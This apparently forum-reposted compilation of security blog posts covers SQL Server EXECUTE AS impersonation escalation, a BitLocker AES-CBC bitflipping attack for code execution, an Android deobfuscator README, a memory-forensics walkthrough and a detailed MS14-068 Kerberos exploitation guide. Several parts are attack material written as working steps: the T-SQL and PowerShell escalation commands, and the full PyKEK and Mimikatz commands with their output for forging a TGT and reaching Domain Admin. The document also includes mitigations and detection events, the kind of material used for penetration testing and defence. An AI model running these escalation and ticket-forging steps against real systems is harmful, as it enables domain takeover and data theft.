Note: Even a small increase in privileges can provide the first step in an escalation chain. For example, if you have the rights to impersonate a db_owner you may be able to escalate to a sysadmin using the attack I covered in my last blog. It can be found here. [h=3]Impersonating SQL Logins as Sysadmin[/h] Once you've obtained a sysadmin account you have the ability to impersonate any database login you want. You can grab a full list of logins from the master database.

-- Get a list of logins
SELECT * FROM master.sys.sysusers
WHERE islogin = 1

Screenshot below: Once you have the list, it's pretty easy to become anyone. Below is an example of impersonating the MyUser4 login.

-- Verify you are still impersonating sa
select SYSTEM_USER
select IS_SRVROLEMEMBER('sysadmin')
-- Impersonate MyUser4
EXECUTE AS LOGIN = 'MyUser4'
-- Verify you are now running as the MyUser4 login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
-- Change back to sa
REVERT

Below is a screenshot: Note: Make sure to REVERT back to the sysadmin account when you're done. Otherwise you'll continue to run under the context of the MyUser4 login. [h=3]Impersonating Domain Admins as a Sysadmin[/h] Did I mention that you can impersonate any user in Active Directory? As it turns out, it doesn't even have to be mapped to a SQL Server login. However, the catch is that it only applies to the SQL Server. That's mostly because the SQL Server has no way to authenticate the Domain User to another system… that I'm aware of. So it's not actually as cool as it sounds, but still kind of fun. Note: Another important note is that when you run xp_cmdshell while impersonating a user, all of the commands are still executed as the SQL Server service account, NOT the SQL Server login or impersonated domain user.
Below is a basic example of how to do it:

-- Get the domain of the SQL Server
SELECT DEFAULT_DOMAIN()
-- Impersonate the domain administrator
EXECUTE AS LOGIN = 'DEMO\Administrator'
-- Verify you are now running as the Domain Admin
SELECT SYSTEM_USER

Note: Remember that the domain will be different for everyone. In my example the domain is "DEMO". Below is an example of the expected output. Revert to the original Login If you get sick of being a sysadmin or a pseudo Domain Admin you can always REVERT to your original login again. Just be aware that if you ran the impersonation multiple times you may have to run REVERT multiple times.

-- Revert to your original login
REVERT
-- Verify you are now running as the MyUser1 login
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')

[h=2]Automating Escalation with Metasploit and PowerShell[/h] Since I'm lazy and don't like to type more than I have to, I wrote a Metasploit module and a PowerShell script to automate the attack for direct database connections. I also wrote a Metasploit module to execute the escalation via error-based SQL injection. Big thanks to the guys on the Metasploit team who helped me get the modules into the framework. [h=3]Metasploit Module: mssql_escalate_executeas[/h] Below is an example of the mssql_escalate_executeas module being used to escalate the privileges of the myuser1 login using a direct database connection. Typically this would happen during an internal penetration test after guessing database user/passwords or finding database connection strings. [h=3]Metasploit Module: mssql_escalate_executeas_sqli[/h] Below is an example of the mssql_escalate_executeas_sqli module being used to escalate the privileges of the myuser1 login using error-based SQL injection.
This is more practical during external network penetration tests, mostly because SQL injection is pretty common and database ports usually are not exposed to the internet. Anyway, pretty screenshot below… [h=3]PowerShell Script[/h] For those who like to play around with PowerShell, I also put a script together that can be used to escalate the privileges of the myuser1 login via a direct database connection. It can be downloaded from https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-ExecuteAs.psm1. The module can be imported with the command below. Also, I'm aware the name is comically long, but at this point I'm just trying to be descriptive.

Import-Module .\Invoke-SqlServer-Escalate-ExecuteAs.psm1

Then you can run it with the following command.

Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword!

Below is a basic screenshot of what it looks like when it runs. [h=2]Alternatives to Impersonation[/h] There are quite a few options for providing stored procedures with access to external resources without giving SQL logins the privileges to impersonate other users at will. However, they all come with their own risks and implementation challenges. Hopefully I'll have some time in the near future to cover each in more depth, but below is a summary of common options. Create roles with the required privileges on external objects. This doesn't always make least privilege easy, and can generally be a management pain. Use cross local/database ownership chaining. This one can end in escalation paths as well. More information can be found at cross db ownership chaining Server Configuration Option. Use the EXECUTE AS clause in the stored procedure to run as the stored procedure owner.
This isn’t all bad, but can result in escalation paths if the store procedure is vulnerable to SQL injection, or is simply written to allow users to take arbitrary actions. Use signed stored procedures that have been assigned access to external objects. This seems like the most secure option with the least amount of management overhead. Similar to the EXECUTE WITH option, this can result in escalation paths if the store procedure is vulnerable to SQL injection, or is simply written to allow users to take arbitrary actions. More information at Tutorial: Signing Stored Procedures with a Certificate. [h=2]Wrap Up[/h] The issues covered in this blog/lab were intended to help pentesters, developers, and dev-ops gain a better understanding of how the IMPERSONATE privilege can be used an abused. Hopefully the information is useful. Have fun with it, but don’t forget to hack responsibly. [h=2]References[/h] EXECUTE AS Clause (Transact-SQL) REVERT (Transact-SQL) Sursa: https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/
-
Code Execution In Spite Of BitLocker Dec 8, 2014 Disk Encryption is “a litany of difficult tradeoffs and messy compromises” as our good friend and mentor Tom Ptacek put it in his blog post. That sounds depressing, but it’s pretty accurate - trying to encrypt an entire hard drive is riddled with constraints. For example: Disk Encryption must be really, really fast. Essentially, if the crypto happens slower than the disk read speed (said another way, if the CPU is a bottleneck) - your solution is untenable to the mass market It must support random read and write access - any sector may be read at any time, and any sector may be updated at any time You really need to avoid updating multiple sectors for a single write - if power is lost during the operation, the inconsistencies will not be able to be resolved easily, if at all People expect hard disks to provide roughly the amount of advertised space. Stealing significant amounts of space for ‘overhead’ is not feasible. (This goes doubly so if encryption is applied after operating system installation - there may not be space to steal!) The last two constraints mean that the ciphertext must be the exact same size as the plaintext. There’s simply no room to store IVs, nonces, counters, or authentication tags. And without any of those things, there’s no way to provide cryptographic authentication in any of the common ways we know how to provide it. No HMACs over the sector and no room for a GCM tag (or OCB, CCM, or EAX, all of which expand the message). Which brings us to… Poor-Man’s Authentication Because of the constraints imposed by the disk format, it’s extremely difficult to find a way to correctly authenticate the ciphertext. Instead, disk encryption relies on ‘poor-man’s authentication’. The best solution is to use poor-man’s authentication: encrypt the data and trust to the fact that changes in the ciphertext do not translate to semantically sensible changes to the plaintext. 
For example, an attacker can change the ciphertext of an executable, but if the new plaintext is effectively random we can hope that there is a far higher chance that the changes will crash the machine or application rather than doing something the attacker wants. We are not alone in reaching the conclusion that poor-man’s authentication is the only practical solution to the authentication problem. All other disk-level encryption schemes that we are aware of either provide no authentication at all, or use poor-man’s authentication. To get the best possible poor-man’s authentication we want the BitLocker encryption algorithm to behave like a block cipher with a block size of 512–8192 bytes. This way, if the attacker changes any part of the ciphertext, all of the plaintext for that sector is modified in a random way. That excerpt comes from an excellent paper by Niels Ferguson of Microsoft in 2006 explaining how BitLocker works. The property of changing a single bit, and it propagating to many more bits, is diffusion and it’s actually a design goal of block ciphers in general. When talking about disk encryption in this post, we’re going to use diffusion to refer to how much changing a single bit (or byte) on an encrypted disk affects the resulting plaintext. BitLocker in Windows Vista & 7 When BitLocker was first introduced, it operated in AES-CBC with something called the Elephant Diffuser. The BitLocker paper is an excellent reference both on how Elephant works, and why they created it. At its heart, the goal of Elephant is to provide as much diffusion as possible, while still being highly performant. The paper also includes Microsoft’s Opinion of AES-CBC Mode used by itself. I’m going to just quote: Any time you want to encrypt data, AES-CBC is a leading candidate. In this case it is not suitable, due to the lack of diffusion in the CBC decryption operation. 
If the attacker introduces a change d in ciphertext block i, then plaintext block i is randomized, but plaintext block i + 1 is changed by d. In other words, the attacker can flip arbitrary bits in one block at the cost of randomizing the previous block. This can be used to attack executables. You can change the instructions at the start of a function at the cost of damaging whatever data is stored just before the function. With thousands of functions in the code, it should be relatively easy to mount an attack. The current version of BitLocker [Ed: BitLocker in Vista and Windows 7] implements an option that allows customers to use AES-CBC for the disk encryption. This option is aimed at those few customers that have formal requirements to only use government-approved encryption algorithms. Given the weakness of the poor-man’s authentication in this solution, we do not recommend using it. BitLocker in Windows 8 & 8.1 BitLocker in Windows 8 and 8.1 uses AES-CBC mode, without the diffuser, by default. It’s actually not even a choice, the option is entirely gone from the Group Policy Editor. (There is a second setting that applies to only “Windows Server 2008, Windows 7, and Windows Vista” that lets you choose Diffuser.) Even using the commandline there’s no way to encrypt a new disk using Diffuser - Manage-BDE says “The encryption methods aes128_Diffuser and aes256_Diffuser are deprecated. Valid volume encryption methods: aes128 and aes256.” However, we can confirm that the code to use Diffuser is still present - disks encrypted under Windows 7 with Diffuser continue to work fine on Windows 8.1. AES-CBC is the exact mode that Microsoft considered (quoting from above) “unsuitable” in 2006 and “recommended against”. They explicitly said “it should be relatively easy to mount an attack”. And it is. 
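Microsoft's warning is easy to verify outside BitLocker. The sketch below reproduces the fine-grained malleability of CBC decryption using a toy, stdlib-only Feistel block cipher as a stand-in for AES (an assumption made for portability; the property comes from CBC's XOR chaining, not from the block cipher itself): flipping one ciphertext bit randomizes that 16-byte plaintext block and flips the identical bit in the following block.

```python
import hashlib

BS = 16  # 16-byte blocks, like AES

def _f(half: bytes, key: bytes, rnd: int) -> bytes:
    # Round function for the toy Feistel cipher (NOT real crypto)
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BS // 2]

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def block_encrypt(blk: bytes, key: bytes) -> bytes:
    l, r = blk[:BS // 2], blk[BS // 2:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(r, key, rnd))
    return l + r

def block_decrypt(blk: bytes, key: bytes) -> bytes:
    l, r = blk[:BS // 2], blk[BS // 2:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(l, key, rnd)), l
    return l + r

def cbc_encrypt(pt: bytes, key: bytes, iv: bytes) -> bytes:
    ct, prev = b"", iv
    for o in range(0, len(pt), BS):
        prev = block_encrypt(_xor(pt[o:o + BS], prev), key)
        ct += prev
    return ct

def cbc_decrypt(ct: bytes, key: bytes, iv: bytes) -> bytes:
    pt, prev = b"", iv
    for o in range(0, len(ct), BS):
        blk = ct[o:o + BS]
        pt += _xor(block_decrypt(blk, key), prev)
        prev = blk
    return pt

pt = b"0123456789abcdef" * 3            # three blocks of known plaintext
key, iv = b"secret key", b"\x00" * BS
ct = bytearray(cbc_encrypt(pt, key, iv))
ct[5] ^= 0x01                           # flip one bit in ciphertext block 0
out = cbc_decrypt(bytes(ct), key, iv)

assert out[0:16] != pt[0:16]            # block 0: randomized
assert out[16:32] == _xor(pt[16:32], b"\x00" * 5 + b"\x01" + b"\x00" * 10)  # block 1: same bit flipped
assert out[32:48] == pt[32:48]          # block 2: untouched
```

Against a real AES-CBC volume the mechanics are identical, which is why a known plaintext location is enough to write targeted bitflips or, at the cost of scrambling the preceding block, entire chosen plaintext blocks.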
As written in the Microsoft paper, the problem comes from the fact that an attacker can modify the ciphertext and perform very fine-grained modification of the resulting plaintext. Flipping a single bit in the ciphertext reliably scrambles the next plaintext block in an unpredictable way (the rainbow block), and flips the exact same bit in the subsequent plaintext block (the red line): This type of fine-grained control is exactly what Poor Man's Authentication is designed to combat. We want any change in the ciphertext to result in entirely unpredictable changes in the plaintext, and we want it to affect an extremely large swath of data. This level of fine-grained control allows us to perform targeted scrambling, but more usefully, targeted bitflips. But which bits do we flip? If the disk is encrypted, don't we lack any idea of where anything interesting is stored? Yes and no. In our testing, two installations of Windows 8 onto the same model of machine put the system DLLs in identical locations. This behavior is far from guaranteed, but if we do know where a file is expected to be, perhaps through educated guesswork and installing the OS on the same physical hardware, then we will know the location, the ciphertext, and the plaintext. And at that point, we can do more than just flip bits: we can completely rewrite what will be decrypted upon startup. This lets us do much more than what people have suggested around changing a branch condition: we just write arbitrary assembly code. So we did. Below is a short video that shows booting up a Virtual Machine with a normal unmodified BitLockered disk on Windows 8, shutting it down and modifying the ciphertext on the underlying disk, starting it back up, and achieving arbitrary code execution. This is possible because we knew the location of a specific file on the disk (and therefore the plaintext), calculated what ciphertext would be necessary to produce our desired shellcode, and wrote it onto the disk.
(The particular file we chose did move around during installation, so we did 'cheat' a little - with more time investment, we could change our target to a system DLL that hasn't been patched in Windows Updates or moved since installation.) Upon decryption, 16 bytes were garbled, but we chose the position and assembly code carefully such that the garbled blocks were always skipped over. To give credit where others have demonstrated similar work, this is actually the same type of attack that Jakob Lell demonstrated against LUKS partitions last year. XTS Mode The obvious question comes up when discussing disk encryption modes: why not use XTS, a mode specifically designed for disk encryption, standardized and blessed by NIST? XTS is used in LUKS and Truecrypt, and prevents targeted bitflipping attacks. But it's not perfect. Let's look at what happens when we flip a single bit in ciphertext encrypted using XTS: A single bit change completely scrambles the corresponding full 16-byte block of plaintext; there's no control over the change. That's good, right? It's not bad, but it's not as good as it could be. Unfortunately, XTS was not considered in the original Elephant paper (it was relatively new in 2006), so we don't have their thoughts about it in direct comparison to Elephant. But the authors of Elephant evaluated another disk encryption mode that had the same property: LRW provides some level of poor-man's authentication, but the relatively small block size of AES (16 bytes) still leaves a lot of freedom for an attacker. For example, there could be a configuration file (or registry entry) with a value that, when set to 0, creates a security hole in the OS. On disk the setting looks something like "enableSomeSecuritySetting=1". If the start of the value falls on a 16-byte boundary and the attacker randomizes the plaintext value, there is a 2^-16 chance that the first two bytes of the plaintext will be 0x30 0x00, which is a string that encodes the ASCII value '0'.
For BitLocker we want a block cipher whose block size is much larger. Furthermore, they elaborate upon this in their comments to NIST on XTS, explicitly calling out the small amount of diffusion. A 16-byte scramble is pretty small. It's only 3-4 assembly instructions. To see how XTS' diffusion compares to Elephant's, we modified a single bit on the disk of a BitLockered Windows 7 installation that corresponded to a file of all zeros. The resulting output shows that 512 bytes (the smallest sector size in use) were modified: This amount of diffusion is obviously much larger than 16 bytes. It's also not perfect - a 512 byte scramble, in the right location, could very well result in a security bypass. Remember, this is all 'Poor Man's Authentication' - we know the solution is not particularly strong, we're just trying to get the best we can. But it's still a lot harder to pop calc with. Conclusion From talking with Microsoft about this issue, one of the driving factors in this change was performance. Indeed, when BitLocker first came out and was documented, the paper spends a considerable amount of focus on evaluating algorithms based on cycles/byte. Back then, there were no AES instructions built into processors - today there are, and it has likely shifted the bulk of the workload for BitLocker onto the Diffuser. And while we think of computers as becoming more powerful since 2006 - tablets, phones, and embedded devices are not the 'exception' but a major target market. Using Full Disk Encryption (including BitLocker in Windows 8) is clearly better than not - as anyone who's had a laptop stolen from a rental car knows. Ultimately, I'm extremely curious what requirements the new BitLocker design had placed on it. Disk Encryption is hard, and even XTS (standardized by NIST) has significant drawbacks. With more information about real-world design constraints, the cryptographic community can focus on developing something better than Elephant or XTS.
I’d like to thank Kurtis Miller for his help with Windows shellcode, Justin Troutman for finding relevant information, Jakob Lell for beating me to it by a year, DaveG for being DaveG, and the MSRC. Sursa: https://cryptoservices.github.io/fde/2014/12/08/code-execution-in-spite-of-bitlocker.html
-
Simplify Generic Android Deobfuscator Simplify uses a virtual machine to understand what an app does. Then, it applies optimizations to create code that behaves identically, but is easier for a human to understand. Specifically, it takes Smali files as input and outputs a Dex file with (hopefully) identical semantics but less complicated structure. For example, if an app's strings are encrypted, Simplify will interpret the app in its own virtual machine to determine semantics. Then, it uses the app's own code to decrypt the strings and replaces the encrypted strings and the decryption method calls with the decrypted versions. It's a generic deobfuscator because Simplify doesn't need to know how the decryption works ahead of time. This technique also works well for eliminating different types of white noise, such as no-ops and useless arithmetic. Before / After There are three parts to the project: Smali Virtual Machine (SmaliVM) - A VM designed to handle ambiguous values and multiple possible execution paths. For example, if there is an if, and the predicate includes unknown values (user input, current time, read from a file, etc.), the VM will assume either one could happen, and takes both the true and false paths. This increases uncertainty, but maintains fidelity. SmaliVM's output is a graph that represents what the app could do. It contains every possible execution path and the register and class member values at each possible execution of every instruction. Simplify - The optimizer. It takes the graphs from SmaliVM and applies optimizations like constant propagation, dead code removal, and specific peephole optimizations. Demoapp - A short and heavily commented project that shows how to get started using SmaliVM. Building There is a bug with dexlib 2.0.3 which can cause Simplify to fail often.
To work around, you must:

1. Clone and build Smali
2. Modify this line in smalivm/build.gradle to point to the built jar, if different: compile files('../../smali/dexlib2/build/libs/dexlib2-2.0.3-dev.jar')

Sorry for this step. It won't be necessary once updated dexlib is released.

To build the jar, use:

./gradlew shadowJar

Sursa: https://github.com/CalebFenton/simplify
-
Analyzing Malicious Processes Posted on 2013/11/11 by jackcr Today I tweeted "Analysis techniques are individually developed. Show people processes and let them be creative". So I wanted to write this post to describe a method I use to analyze processes on hosts that are suspected of being compromised. When attackers gain access to your network they will need to perform certain activities in order to accomplish their goals. Very often these activities will result in executables being run and processes started as a result. Identifying these processes is very important, but what you do afterwards is where you begin to earn your money. For this post I will be using a memory image from the jackcr-challenge which I created last year. If you are interested in tackling this challenge it can be downloaded from the link on the right side bar or you can follow this link https://docs.google.com/file/d/0B_xsNYzneAhEN2I5ZXpTdW9VMGM/edit. When looking at processes, pay attention to the start times. We should be focusing on ones that started within the time frame we are investigating (if the machine has been rebooted after the initial compromise then this method will obviously not work). Remember that attackers will very often leverage Windows tools, so don't discount processes that seem like they would be non-malicious just because they were executed from a legitimate Microsoft executable. It's also a good idea to pay attention to spawned processes as well as parent processes. If cmd.exe was spawned from iexplore.exe it may be cause for some concern. Looking at our memory image we start by inspecting the process listing. The above command will display the following output. At first glance the cmd.exe process may seem a little suspicious, but it was spawned from explorer.exe and is responsible for mdd.exe which collected the memory dump. The PSEXECSVC.exe process looks a little suspicious though.
When psexec.exe is executed on a client machine it will copy the psexecsvc.exe binary over an SMB connection to the destination, start a service, and create a named pipe over which commands will be executed. This may very well be an admin performing maintenance on the server, but not knowing for sure warrants investigation. The first thing I will want to look at are the IPs that have been communicating with this machine on ports 135 and 445, since I know psexec communicates over these. As these connections may no longer be established, I will use the Volatility plugin connscan, which has the ability to locate closed TCP connections as it scans for _TCPT_OBJECTS which may still reside in memory. Based on the output we have 3 machines that we may need to validate and possibly investigate after performing analysis on this machine. We will also use these IPs when analyzing the process strings. Before looking at the strings I want to look at the open handles to the process, as they may give some clues to additional items that may need to be investigated. At this point I mainly want to look at open file handles. The above command will produce the following output. We can see the named pipe created by the execution of psexec on the client machine, but not really anything else that would steer my investigation. The output can be large so I initially like to start with a smaller subset that I think may give some results I'm looking for. At this point I will broaden my search to see if I can find anything else of interest. We can see in the below output that we have a hostname that's tied to this process. If this turns out to be a malicious process we will need to immediately contain that host to prevent further lateral movement and investigate for additional compromises. As processes start, the operating system will allocate up to 2GB of virtual address space for each process to execute in. I like to think of processes as a container of activity.
If I specifically look at that container I should see activity that is directly related to the activity I'm looking for. This is important because when looking at memory strings it's very easy to find things that look really bad, only to find out that they are part of an AV signature or part of a legitimate connection. It is also much easier to analyze a small section of memory than the entire memory dump. Using the Volatility plugin memdump we can dump the entire contents of a process into a binary file. We should create a strings file with both ascii and unicode strings, as it's much faster to grep through an ascii file than a binary file. By default I like to prepend each string with the byte offset in case I need to locate that string in the dump file. We can use the following 2 commands to produce this file. Very often when attackers want to execute commands on compromised machines they will create batch scripts to perform these tasks. Just by searching the strings file for "echo off" we are able not only to confirm that this host is compromised, but also to gain insight into what happened on this machine, and to identify indicators to look for on our network. The 3 batch scripts identified performed the following actions: 1. Rar'd up the contents of C:\Engineering\Designs\Pumps 2. Created a scheduled task to copy wc.exe to the system32 directory and execute it at 04:30 3. Collected system information and directed the output to the file system.dll Searching the process data for the IPs, I was able to locate these log files in memory indicating a login to this machine using the sysbackup account, which was the same username identified in the batch script. The host that initiated the login was also the host identified in the handles output. Knowing that this machine is confirmed compromised, there are some additional actions we must take in hopes of limiting the scope of the incident. 1. Search network for any directories named webui in the system32 directory 2.
Attempt to locate wc.exe in memory or on the host itself to determine capabilities (typicaly locating in memory would be much faster then collecting on the host). 3. Collect and analyze data from 3 ip’s seen making port 445 connections 4. Search network for presence of wc.exe, ra.exe, system.dll 5. Search logs for 540 / 4624 type 3 logon attempts from suspicious ip’s as well as machines using the sysbackup account. 6. Change the sysbackup credentials as well as all user credentials on the compromised machines (domain and local) 7. Determine what files were rar’d 8. Look for possible data exfil in network traffic There is a lot of additional data in these memory images and I encourage you to have a look at them if you’ve not already done so. Again I hope this helps somebody out there and let me know if you have any questions or comments. Sursa: Analyzing Malicious Processes
-
Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)
by Sean Metcalf

MS14-068 References:
AD Kerberos Privilege Elevation Vulnerability: The Issue
Detailed Explanation of MS14-068
MS14-068 Exploit POC with the Python Kerberos Exploitation Kit (aka PyKEK)

After re-working my lab a bit, I set about testing the MS14-068 POC that Sylvain Monné posted to GitHub a few days ago. I configured a Windows 7 workstation with Python 2.7.8 and downloaded the PyKEK zip as well as the Mimikatz zip file. The MS14-068.py Python script (part of PyKEK) can be run on any computer that has connectivity to the target Domain Controller. I ran PyKEK against a Windows Server 2008 R2 Domain Controller not patched for MS14-068 using Kali Linux as well as a domain-joined Windows 7 workstation.

Interesting side note: I also stood up one Windows Server 2012 and one Windows Server 2012 R2 Domain Controller in the same site as the two unpatched Windows Server 2008 R2 DCs. None of the Domain Controllers in my lab.adsecurity.org AD Forest are patched for MS14-068. After successfully running the PyKEK script to generate the TGT, I was unable to successfully get a TGS to exploit the 2008 R2 DC. After shutting down the 2012 & 2012 R2 DCs, I could use the forged TGT to get a TGS and access the targeted 2008 R2 DC (ADSDC02). I will be looking into this more later this week.

12/8 Update: I added a Mitigation section at the end of the post as well as events from a patched Domain Controller when attempting to exploit (in the events section).

Staging the Attack:

The targeted user account in this post is "Darth Sidious" (darthsidious@lab.adsecurity.org). Note that this user is a member of Domain Users and a Workstation group. This group membership stays the same throughout the activity in this post (I took the screenshot after exploiting the DC).
Assume that this user is an authorized user on the network and wants to get Domain Admin rights to perform nefarious actions. The user already has a valid domain account and knows the password for the domain. This is no different from an attacker spearphishing this user and stealing their credentials as they get local admin rights on the computer. Once the attacker has valid domain credentials and local admin rights on a computer on the network, they can leverage PyKEK to generate a forged TGT by performing standard communication with the target (unpatched) DC. The PyKEK ms14-068.py Python script needs some information to successfully generate a forged TGT:

User Principal Name (UPN) [-u]: darthsidious@lab.adsecurity.org
User Password [-p]: TheEmperor99!
User Security IDentifier (SID) [-s]: S-1-5-21-1473643419-774954089-2222329127-1110
Targeted Domain Controller [-d]: adsdc02.lab.adsecurity.org

The SID can be found by running the "whoami" command while logged in as the target user. You can also get this information from PowerShell by running: [security.Principal.WindowsIdentity]::GetCurrent()

As I noted in my previous post on PyKEK, the following group membership is included in the forged TGT:

Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator Owners (520)

Phase 1: Forging a TGT:

Here's a screenshot of the exploit working in Kali Linux (1.09a). After generating the ccache file containing the forged and validated TGT Kerberos ticket, the ccache file can be copied to a Windows computer to run Mimikatz. It works well on Windows running Python as well (command is in bold & italics).

c:\Temp\pykek>ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
[+] Building AS-REQ for adsdc02.lab.adsecurity.org… Done!
[+] Sending AS-REQ to adsdc02.lab.adsecurity.org… Done!
[+] Receiving AS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Parsing AS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Building TGS-REQ for adsdc02.lab.adsecurity.org… Done!
[+] Sending TGS-REQ to adsdc02.lab.adsecurity.org… Done!
[+] Receiving TGS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Parsing TGS-REP from adsdc02.lab.adsecurity.org… Done!
[+] Creating ccache file 'TGT_darthsidious@lab.adsecurity.org.ccache'… Done!

Here's the screenshot of the ms14-068 exploit working on Windows. I ran WireShark on the targeted Domain Controller. Here's the pcap (zipped) of the network traffic from the PyKEK ms14-068.py script: ADSecurityOrg-MS14068-Exploit-KRBPackets

Note that I have generated a forged TGT with a single, stolen domain account. The next step is to use this forged TGT, so I log on to a computer as the local admin account with network access to the targeted Domain Controller. Whoami shows I am logged on as admin on the computer ADSWKWIN7. Klist shows there are no Kerberos tickets in memory for this user (there wouldn't be, this is a local admin account). The PyKEK ms14-068.py Python script saves the forged TGT to a ccache file (TGT_darthsidious@lab.adsecurity.org.ccache) in the current working directory (c:\temp\pykek shown above).

Phase 2: Injecting the forged TGT and gaining a valid TGS:

After the forged Kerberos TGT ticket is generated, it's time to inject it into the current user session using Mimikatz (command is in bold & italics).

c:\Temp\pykek>c:\temp\mimikatz\mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" exit

  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 20 2014 01:35:45)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz   (oe.eo)
  '#####'    with 15 modules * * */

mimikatz(commandline) # kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache
Principal : (01) : darthsidious ; @ LAB.ADSECURITY.ORG

Data 0
Start/End/MaxRenew: 12/7/2014 3:10:30 PM ; 12/8/2014 1:10:30 AM ; 12/14/2014 3:10:30 PM
Service Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG
Target Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG
Client Name (01) : darthsidious ; @ LAB.ADSECURITY.ORG
Flags 50a00000 : pre_authent ; renewable ; proxiable ; forwardable ;
Session Key : 0x00000017 – rc4_hmac_nt af5e7b47316c4cebae0a7ead04059799
Ticket : 0x00000000 – null ; kvno = 2 […]
* Injecting ticket : OK

mimikatz(commandline) # exit
Bye!

Note that since I am injecting the forged TGT, which states that I am a member of Domain Admins, Enterprise Admins, etc., into my session, when this TGT is passed to an unpatched DC for a Kerberos service ticket (TGS), the service ticket will show I am a member of these groups. When the TGS is presented to a service, the user account is treated as if it is a member of these groups, though viewing the group membership shows the user is conspicuously absent. This enables an attacker to act as if they are a member of groups when they are not.

I ran WireShark on the targeted Domain Controller. Here's the pcap (zipped) of the network traffic using the forged TGT ticket via Mimikatz and connecting to the Domain Controller's Admin$ share: ADSecurityOrg-MS14068-Exploit-KRBPackets-TGTInjection-And-DC-AdminShare-Access

Once I have successfully injected the forged TGT into my session (remember, I am logged onto a domain-joined Windows 7 computer as the local admin, not with AD domain credentials), I leverage this to connect to the Domain Controller and gain access to the Active Directory database (ntds.dit).
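The groups the forged PAC claims membership in are identified by RID; each claimed group SID is simply the domain SID with the well-known RID appended. A minimal Python sketch (the helper name is mine) using the RIDs listed earlier in the post:

```python
# RIDs included in the forged PAC: Domain Users, Domain Admins,
# Schema Admins, Enterprise Admins, Group Policy Creator Owners
FORGED_RIDS = (513, 512, 518, 519, 520)

def forged_group_sids(domain_sid, rids=FORGED_RIDS):
    """A group SID is just the domain SID with the group's RID appended."""
    return [f"{domain_sid}-{rid}" for rid in rids]

sids = forged_group_sids("S-1-5-21-1473643419-774954089-2222329127")
print(sids[1])  # → S-1-5-21-1473643419-774954089-2222329127-512
```

This is why a single known domain SID (visible to any authenticated user via whoami) is all the attacker needs to claim Domain Admins and Enterprise Admins membership in the forged ticket.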
Domain Controller Event Logs from the Attack:

Here are the event logs on the targeted Domain Controller when using the forged TGT to get a TGS in order to access the Domain Controller's admin$ share and locate the AD database files:

Event 4769 shows darthsidious@lab.adsecurity.org requesting a TGS Kerberos service ticket using the forged TGT.
Event 4624 shows darthsidious@lab.adsecurity.org using the TGS service ticket to log on to the target Domain Controller.
Event 5140 shows darthsidious@lab.adsecurity.org using the TGS service ticket to connect to the target Domain Controller's Admin$ share (net use \\adsdc02.lab.adsecurity.org\admin$), which only an administrator has access to.
Event 4672 shows darthsidious@lab.adsecurity.org successfully authenticated to (and logged on to) the target Domain Controller, which only an administrator has access to. Note that this user has SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeTakeOwnership, etc., showing the user has full Admin access to this computer. It's Game Over at this point.

Here's what it looks like when a client attempts to use a forged TGT to get a Kerberos service ticket (TGS) when communicating with a patched DC:

Event 4769 shows darthsidious@lab.adsecurity.org attempting to get a Kerberos service ticket (TGS) for a CIFS (SMB) share on the Domain Controller (adsdc01.lab.adsecurity.org). The TGS request fails because the DC (adsdc01.lab.adsecurity.org) is patched, and it logs this failure in the security event log as a failed 4769 event. NOTE: This is the event Microsoft recommends you monitor closely after applying KB3011780 (the MS14-068 patch).
Event 4776 shows an audit failure for the computer and the username logged into the computer. This event is associated with the 4769 event above. Since I was logged on as the local administrator account "admin", it shows in the log. This is a red flag.
However, I could have created a local admin account on the box with the same name as a Domain Admin in the domain, and it may not be scrutinized as much. Check your logs!

Note: There should only be minor differences in performing any of these actions from a non-domain-joined computer. This concludes the lesson on how to own an Active Directory forest in less than 5 minutes with only a user account and a connected Windows computer (and associated admin account).

Mitigations:

Patch all Domain Controllers with KB3011780 in every AD domain. I uploaded a sample script for getting KB3011780 patch status for all Domain Controllers: Get-DCPatchStatus (change file extension to .ps1)

[UnPatched DCs] Monitor event ID 4672 for users who are not members of domain-level admin groups (the default groups able to log on to Domain Controllers; this is why you shouldn't use these default, built-in groups for delegation of administration):
Enterprise Admins (admin on all DCs in the forest)
Domain Admins
Administrators
Server Admins
Backup Operators
Account Operators
Print Operators
Other groups delegated in your environment to log on to Domain Controllers

[Patched DCs] Monitor event ID 4769 (Kerberos Service Ticket Operation), which shows failed attempts to get Kerberos service tickets (TGS).
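As a sketch of the [UnPatched DCs] monitoring idea, here is a minimal Python filter over exported security events. The event record fields and the membership lookup are invented for illustration; this is not a real Windows event log API, just the decision logic:

```python
# Default groups expected to log on to Domain Controllers
ADMIN_GROUPS = {"Enterprise Admins", "Domain Admins", "Administrators",
                "Server Admins", "Backup Operators", "Account Operators",
                "Print Operators"}

def suspicious_4672(events, group_membership):
    """Flag 4672 (special privileges assigned) events for accounts that
    are not in any group expected to log on to Domain Controllers."""
    flagged = []
    for ev in events:
        if ev["id"] == 4672:
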